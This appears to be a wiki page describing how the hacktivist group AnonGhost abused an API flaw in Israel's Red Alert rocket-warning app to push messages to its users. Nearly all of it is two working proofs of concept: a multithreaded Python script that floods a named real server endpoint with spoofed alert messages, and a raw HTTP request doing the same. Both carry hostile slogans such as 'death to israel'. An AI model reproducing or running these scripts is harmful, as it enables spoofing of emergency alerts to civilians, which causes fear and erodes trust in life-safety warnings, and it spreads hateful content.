RedAlert
Jump to navigation
Jump to search
Hacktivist group AnonGhost hacked a Red Alert application that Israelis use to be alerted for when Hamas performs rocket fire attacks via an API vulnerability, allowing them to send red alert messages on mass to anyone and everyone who uses the app, allowing them to say anything they like.
Explanation of the Hack
POC 1:
import requests import threading import time url = "http://54.214.248.70:80/redalert/and/api/chat.php" headers = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Dalvik/2.1.0 (Linux; U; Android 13; M2101K7BG Build/TP1A.220624.014)", "Host": "54.214.248.70", "Connection": "Keep-Alive", "Accept-Encoding": "gzip", } data = { "msg": "death to israel", "method": "sendmsg", "time": "🇵🇸", "hash": "f1f416dd17fb4668098a8b02c845021f", "token": "fWIzje8JYuI:APA91bGbeHvcsQpsPBucVxgUZcUGIT8ZXBNCKGSNdHmxdI0BfXW-idB6qvFTLZhBBI3jmVdBawsmCSPhkeDD5g_JKz6n7Q3ohltrJOiKHOJl47Sv0417E70hbykh8lfhLvD9_GeTN9Me", "ts": "1696713616907", "username": "࿕", } num_threads = 500 num_requests = 20000 def send_request(): for _ in range(num_requests // num_threads): response = requests.post(url, headers=headers, data=data) print(response.text) threads = [] for _ in range(num_threads): thread = threading.Thread(target=send_request) threads.append(thread) thread.start() for thread in threads: thread.join()
POC 2:
POST /redalert/and/api/chat.php?msg=AnonGhost&method=sendmsg&time=7%3A13&hash=52bd01a926202bc0e5e7ba68270e4705&token=FUCKISRAEL&ts=1696720382270&username=AnonGhost&& HTTP/1.1 Host: 54.214.248.70 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close